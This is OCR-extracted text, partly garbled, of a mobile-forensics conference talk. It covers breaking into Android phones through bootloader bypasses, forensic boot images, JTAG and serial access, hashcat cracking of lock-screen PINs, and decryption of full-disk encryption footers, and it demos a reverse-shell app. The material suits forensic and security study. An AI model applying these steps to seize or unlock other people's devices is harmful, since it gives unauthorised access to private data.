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Introduction 



• Why this talk is useful 

• Defend access / gain access 

• Device seizure, loss, border crossing, stop and search, espionage... 

• The company 

• viaForensics - Mobile security and digital forensics, strong R&D 
team, government agencies and corporations 

• The speaker 

• Thomas Cannon - Director of Breaking Things 



ADB off by default 



Screen lock 



Code signing for updates 
and boot images 

Encryption 

Variety of device hardware, 
software and configuration 




CHALLENGE ACCEPTED 



Bootloader Essentials 



• How we use the bootloader 

• Accessing bootloader mode 

• Bootloader protocols 

• Bootloader protection 




Defeat The Bootloader 




S-ON vs S-OFF 

secuflag controlled in radio firmware 

Gold Card - specially formatted MicroSD card 
can bypass carrier ID check when flashing ROMs 



White Card - special SIM card used as an 
authentication token to control access to 
diagnostic mode 



HTC 
Example 



Defeat The Bootloader 




Emulate White Card with hardware, combine with 
Gold Card to enter diagnostics and clear S-ON 



jut 



HTC 
Example 



Defeat The Bootloader 



White Card not needed for CDMA phones 

Once S-OFF, can RAM load a custom boot image 

This technique wipes most devices! But not all. 

Successfully used this technique to gain access to 
some locked stock HTC devices such as HTC 
Desire 

Try it yourself with an XTC Clip 



HTC 
Example 



Forensic Boot 



• Start early in the boot chain before the 
system loads 

• Provide ADB root shell over USB which 
can be used to image the device 

• Do not mount anything, including 
cache, to prevent any writes to 
partitions 

• Devices with raw NAND flash and wear 
levelling implemented in software 
(YAFFS2) can be prevented from 
overwriting deleted data 




Build Boot 



$ abootimg -x stock-recovery. img 

$ abootimg-unpack-initrd 

$ cd ramdisk 

(edit ramdisk contents) 

$ cd .. 

$ abootimg-pack-initrd -f 

$ abootimg -u stock-recovery. img -r initrd.img 



RAM Disk Contents 



/dev 
/proc 
/sbin 
adbd 

busybox (+ symlinks) 

nanddump (to dump partitions) 
/sys 
init 

default. prop (enable root shell, ro.secure=0) 
init.rc (do not mount partitions, just start adbd) 
ueventd.rc 



Flash and RAM Load 

• Samsung 

• Dump partitions with ODIN <= 1 .52 or Heimdall. Maybe. 

• Flashing with ODIN or Heimdall 

• heimdall flash --recovery recovery.bin (Epic 4G) 

• heimdall flash --kernel zlmage (Galaxy S) 

• HTC 

• fastboot boot recovery.img (RAM Loading) 

• fastboot flash recovery recovery.img (flash partition) 

• Motorola 

• sbfjlash image name.sbf (make sure it only contains recovery) 



How it works 
Flasher Box 

• ORT 

• Riff Box 

• Medusa Box 



mer 




1. TRST 

2. TCK 

3. TDO 

a. tdi 

Sh tms 

6. &TCK 



000 
000 



Serial 



• Some devices have debug access 
via serial cables which can be used 
to gain access to data 

• On Samsung Galaxy SI I / Galaxy 
Note this is activated by grounding ID 
pin of USB with a 523K ohm resistor 

• TTL serial access provided on D+ 
and D- pins of USB connector 



• Use a Bus Pirate and MicroUSB 
breakout board to connect 



Crack PIN or Password 

• Salt 

• /data/data/com. android, providers, settings/databases/ 
settings. db 

• SELECT * FROM secure WHERE name = 
' lockscreen . password_salt' 

• PIN / password 

• /data/system/password, key 

• Salted SHA1 of password concatenated with salted MD5 



Crack PIN or Password 

• Calculate the value of the salt in lowercase hex with no padding 
$ python -c "print '%x' % 720624377925219614" 
a002c0dbeb8351e 

• Copy the last 32 bytes of password. key (MD5 hash in hex), add 
a colon and then add the salt 

5D8EC41 CB1 81 2AC0BD9CB6C4F2CD01 22:a002c0dbeb8351 e 

• Crack with software such as oclHashcat-lite 



File Tools Help 



hashcat 



cudaHashcat 



cudaHashcat-plus 



cudaHashcat-lite 



Hash: 5D8EC41CB 13 1 ZAC0BD9CB6C4F ZCDO 1 ZZ: aOO ZcOdbebS 3 5 le 



j/j Mask: 717171717171717171 



e 




Hash type : md 5 (5pass . 5salt) 




Custom charsets 



Password length 



V] Charset 1: ?d 



o 



Length: 4 




□ Charset Z: 

□ CharsetS. 

□ Charset 4: 



Assume charset is given in hex 
Assume salt is given in hex 



Resources 

] Use non -blocking async calls 
GPU devices: 



Output 



] Write recovered hashes to file: 



GPU workload tuning: 8 
GPU loops: 
GPU watchdog: 



Open. 



Z56 



Format: 



hash:pass 



90 



Start 



cudaHashcat-lite64.exe -hash-type 1 --custom -charset 1 ?d --pw-max 9 5DSEC41CB1S1ZA 



|J hashcat-gui 




File Tools Help 



hashcat 



cudaHashcat 



cudaHashcat-plus 



cudah 



Hash: 5D8EC41CB 13 12AC0BD9CB6C4FZCD0 !ZZ:a00Zc0c 



V] Mask: 717171717171717171 



Hash type: md5(5pass.Ssalt) 




Custom charsets 



V] Charset 1: ?d 



o 



Pa 
Lf 



□ Charset 2: 

□ Charset 3: 

□ Charset 4: 



O 
O 



Resources 

Use non -blocking async calls 
GPU devices: 




■I I ^ I 



C:\Wi n d ows\sy stern J2\cmd .exe 



cudaHashcat— lite U0.8 by atom starting... 

GPU-Loops: 1Q24 
GPU-Accel: 16 

Password lengths range : 4 - 9 
Platform: NUidia compatible platform found 
Uatchdog: Temperature limit set to 90c 
Device ttl : GeForce GTX 560M, 1536MB, 1550Mh: 




, 4MCU 



5d8ec4icbi812ac0bd9cb6c4f 2cd0122 :a002c0dbeb8351e : 123456789 

Status : Cracked 

Hash. Target . . : 5d8ec41cbl812ac0bd9cb6c4f 2cd0122 :a002c0dbeb8351e 

Hash. Type . . . . : md5<$pass .$salt > 

Time .Running. : 2 seconds 

Time .Left .... : sees 

Plain .Mask. . . : ?1?1?1?1?1?1?1?1?1 

Plain .Text . . . : ****40389 

Plain. Length. : 9 

Progress : 991723520/1000000000 <99.17>0 

Speed. GPU. ttl. : 536.3M/S 

HUMon.GPU.ttl.: 83x GPU, 46c Temp 

Started: Ued Jan 11 06:24:04 2012 
Stopped: Ued Jan 11 06:24:08 2012 



GPU workload tuning: 8 
GPU loops: 
GPU watchdog: 



256 



90 



Start 



cudaHashcat-lite64.exe -hash -type 1 — c 



C:\Wi n d ows\sy steim32\cmd .exe 








cudaHashcat-lite U0.8 by atom starting. 



GPU-Loops: 1824 
GPU-flccel: 16 

Password lengths range: 4-9 

[Platform : NUidia compatible platform found 

Uatchdog: Temperature limit set to 90c 

Deuice ttl: GeForce GTX 560M, 1536MB, 1550Mhs, 4MCU 

Ll6ec7f 12b91cdd818e4bcf a933947cf 2 :a002c0dbeb8351e : fr4sswd] 



Status 

Hash. Target . 
Hash. Type . . . 
Time .Running 
Time .Left . . . 
Plain .Mask. . 
Plain .Text . . 
Plain .Length 
Progress .... 
Speed. GPU. ttl 
HUMon.GPU.ttl 



Cracked 

46ec7fl2b91cdd818e4bcfa933947cf2:a002c0dbeb8351e 

md5<$pass .5 salt > 

47 seconds 

54 seconds 

?1?1?1?1?1?1 

***ijZ 

6 

26263945216/56800235584 <46.24>0 

561.5M/S 
97x GPU, 61c Temp 



Etarted: Ued Jan 11 07:30:57 2012 
Stopped: Ued Jan 11 07:31:48 2012 



D 



HID Brute Force? 




Video 



HID Bru 



AVR ATMEGA32U4 emulates 
USB keyboard typing PINs 

USB OTG cable for USB host 



Devices usually rate limit 
attempts and wipe after too 
many incorrect passcodes 



Force 




Android Encryption 



# f 


x ■ 9:09 


I About phone 


Status 




Phone number, signal, etc. 




Legal information 


Model number 




Nexus S 




Android version 




4.0.4 




Baseband version 




I9020XXKI1 




Kernel version 




3.0.8-g6656123 
android-buiid{a)vpbsl #1 
Thu Feb 2 1 6:56:02 PST 201 2 




Build number 




IMM76D 





# * A • 9:11 

Encrypt phone 

You can encrypt your accounts, 
settings, downloaded apps and 
their data, media, and other 
files. Once you encrypt your 
phone, you must enter a 
numeric PIN or password to 
decrypt it each time you power 
it on: you can't unencrypt your 
phone except by performing a 
factory data reset, erasing all 
your data. 

Encryption takes an hour or 
more. You must start with a 
charged battery and keep your 
phone plugged in until 

£»n/*»rwrYt-i/-ir\ \t> nnmnloto If \ir\i i 




Encrypting 



Wait while your phone is being 
encrypted. 5% complete. 




Android Encryption 




if About phone 
Status 

Phone number, signal, etc. 



Legal information 



Model number 

Nexus S 

Android version 

4.0.4 



ail 
A ■ 9:09 



Baseband version 

I9020XXKI1 

Kernel version 

3.0.8-g6656123 
android-build@ V pbsl #1 
Thu Feb 2 16:56:02 PST2012 



Build number 

IMM76D 



• Supported since Android 3.0 

• Based on dm-crypt 

• AES 128 CBC 

• Implementations may vary, 
e.g. Samsung has their own 
key management module 



Android Encryption 



keylen=32 



Password/PIN 



PBKDF2 
X2000 



Key+IV (32 bytes) 



Key (1 28 bit) IV (1 28 bit) 



/dev/urandom 



Salt (128 bit) 



Master Key (1 28 bit) 



AES 1 28 
CBC 



Encrypted Master Key 
(1 28 bit) 



Android Encryption 



IV (ESSIV:SHA256) 

I 



Master Key (128 bit) — ^MSjlnMlsffil — "Encrypted userdata partition 



t 

userdata partition 



Cracking Encryption 



2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 



__le32 magic; 
__le!6 major_versionj 
__Iel6 ninorversion ■ 

__le32 ftr_ s i 2e; 

__le32 flags; 

__le32 keysize; 

— Ie32 sparel; 

__le64 fs size; 

_le32 f ail€d_decrypt count ■ 



Encrypted Master Key + 
Salt stored in footer 

Footer stored at end of 
partition or in a footer file 
another partition or as a 
partition itself 

Image device and locate 
footer + encrypted 
userdata partition 



Crackin 



Parse footer 

Locate Salt and Encrypted Master \ 

Run a password guess through 
PBKDF2 with salt, use resulting key 
and IV to decrypt master key, use 
resulting master key to decrypt first 
sector of encrypted image. 

If password is correct, plain text will 
be revealed 



■ 



1 Major Version 


0xD0B5Bl^^^^™^^^^^^^^ 


fm Mi nor Version . 


: 1 


m Footer Si 2e 




■ F ^gs 


104 bytes 1 


■ fey Si 2e 


0*00000000 j 


■ Failed Decrvnt* 


128 bits j 


■ Crypto Ty P e yPtS ; 


1 


■ Encrypted Key -' 




■ Salt ¥ ' 


fc*2AF933BlA F096g D8 \" Qr 1 


I 


j 


1 ' fy ? n e Password: 1 
1 Derived K ey . „ 


234 ■ 


1 Derived IV ^ 




I De ^ypted Key - « 









Magic : 0xD0B5BlC4 

Major Version : 1 

Minor Version : 9 

Footer Size i 104 bytes 

Flags I 0X00000000 

Key Size : 128 bits 

Failed Decrypts: 

Crypto Type : aes-cbc-essiv:sha256 

Encrypted Key : 0X82AF933B1AF0968D835239CE69526C60 

Salt i 0X31D720E6F7F78A23D793E125378E5F49 

Trying Password: 1234 @SGGti@3lFwO 

Derived Key : 0X38E6A59647776E94AD09C1DACA7B4971 

Derived IV : 0xB3F8D260076D92AlCFAE7D807DC1613C 

Decrypted Key : 0X0552393822D311BE023617F258C3E1BB 

ESSIV IV : 0XB31C2837995393102ECC539D460D77C1 

Decrypted Data : 0xEE961EE40CC036D88D2D29206D888FC500000000000000000000000000000 

00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000000000000000000 
000 



Magic : 0xD0B5BlC4 

Major Version : 1 

Minor Version : 

Footer Size : 104 bytes 

Flags I 0X00000000 

Key Size : 128 bits 

Failed Decrypts: 

Crypto Type : aes-cbc-essiv:sha256 

Encrypted Key : 0X82AF933B1AF0968D835239CE69526C60 

Salt : 0X31D720E6F7F78A23D793E125378E5F49 

Trying Password: 5555 UlISSGSSwlFwj 

Derived Key : 0x3AC2D38F705281EBB45430D5770B2BFD 

Derived IV : 0xAF4CB6F2C3481C20B8430DE869608A4A 

Decrypted Key : 0x85BE68592503F89CB0F9BBD82972AE07 

ESSIV IV : 0X52989B5B082368326FB4014D06A0A67C 

Decrypted Data : 0XB0D17B11AB13D1C432A4816ABF39319976187A54D58961B7808191E6AA4F4 
06E8A4DCC2D4986F377981D79AD7C625390545B3033472EB069AEC33451BF8DDB8E6B4A502C41A61 
1309BDFC3E65A88027B7ECCB1B7D04573EAD6194C87C0A8D661E62D942354EF218378E76EB30BFB2 
5E97391AC9A268BCD49F274680313ED1D1FFD4663B249A282CCC49D5C54EB528427FCC43B3CDF2FC 
86892271F89736CE53BBD117BFBB8025DA75C74EF46025F6AC1547DA8D3F1FCC6542DA0EBA9F5D87 
0D3743E5440D61D4DDAE26048018002C597335FDDB84AF89922E0C165128A3C51082877CE9F51840 
12FFE73CA346922B1F931E3C6EE30AC781479D2DB6FB168965A92809B54523DC228AC473AE8164A8 
F20A2BB74617CFB536AF3B61BBF0C273BE30F006E646817E42FD4579B8F3B34934C12F5D280CE764 
F1381120D746683F2AC5AF825CC25AE089B355044E86CC207484A0F365E465C7B2E980456D4C0BA8 
462A19EF4227E1E3AF92A9386BF585894327740647B537DB96302B51899DED97B37FC49D1B35F618 
FC4F775E3FB159DD4800FB8577C38404AAD366E18E1A62C2E944CDE45732A9B5E20F80D6DE03FCAF 
855CE41D1D8CE3D033FE8B05F861F781DCA100A18DF910EA519A6E52C15DADCCC8C10A42AC3D7BD0 
DE37C3B28932131D37198BD7AB1D48CB895C8B1159715F49424887D245034C6510F43FED085CBE23 
8CA 



• Cracking PINs takes seconds. Passwords 
are usually short or follow patterns due to 
being the same as the lock screen password 



Evil Maid Attack 



Load app onto system partition, wait for 
to boot phone, get remote access to 
decrypted user data 

Rootkits - easy to compile for Android 

Evil USB charger 



Reverse Shell 




QvFWebShell 

<- GO localhost:8080/shell/njncRoO4 



© ft H H ^ 




■ 5554:Android-2.3 



vF Android WebShell Started 
uid=10039 <app_39) gid=10039 <app_39) 

Linux version 2 . £ . 29-002Gl-g0097074-dirty (digit@digit .mtv. corp. google . com) 
4.4.0 (GCC) > #20 Wed Mar 31 09:54:02 PDT 2010 



(gcc version 



d rwxr-x system 

d rwxr-x system 

d rwxr-x system 

rwxr-x system 

d rwxr-x system 

rwxr-x system 



sdcard_rw 2011-11-17 04:37 LOST.DIR 

sdcard_rw 2011-11-17 22:23 DCIM 

sdcard_rw 2011-11-22 04:17 Android 

sdcard_rw 13861 2011-12-12 14:33 Twilight .apk 

sdcard_rw 2011-12-12 14:16 download 

sdcardrw 16294 2011-12-12 14:20 AndRevShell . apk 



C:\WindQW2\system3 2\crnd.exe - python andrevshell.py 



= 



C:\Users\Thorias\Docunents\Pro jects\uiaForensics\flndReuShell>python andrevshell.p 
FteuShell Server running on port 8080 




I 



:H6 



sday, December 13 
Charging (50%) 



VIAFORENSICS 

innovative digital fore nsics and security 



• App with no permissions can create a reverse shell, 
giving remote access to attacker 



Desperate 

• Hard reset - some 
devices prior to 3.0 
did not wipe data 
properly. Wipe, boot, 
root and recover 

• Chip-off - de-solder 
NAND chips 

• Screen smudges 



Techniques 



More Techniques! 



• Custom update.zip - can you get one signed? 

• Race condition on updates via SD cards - fixed 

• Own a CA? Who doesn't these days? MITM 
connection, push app, update or exploit 

• Entry via Google Play, if credentials cached on 
desktop 



Santoku Linux 



Free and open bootable Linux 
distribution full of tools 

Project is a collaboration with 
other mobile security pros 

Mobile Forensics 

Mobile App Security Testing 

Mobile Malware Analysis 



Check out the Alpha release at https://santoku-linux.com 



VIAFORENSICS 




Thomas Cannon 




'thomas.cannon 
github.com/thomascannon 
tcannon@viaforensics.com 



For the latest versions of our presentations visit: 
httDs://viaforensics.com/resources/Dresentations 



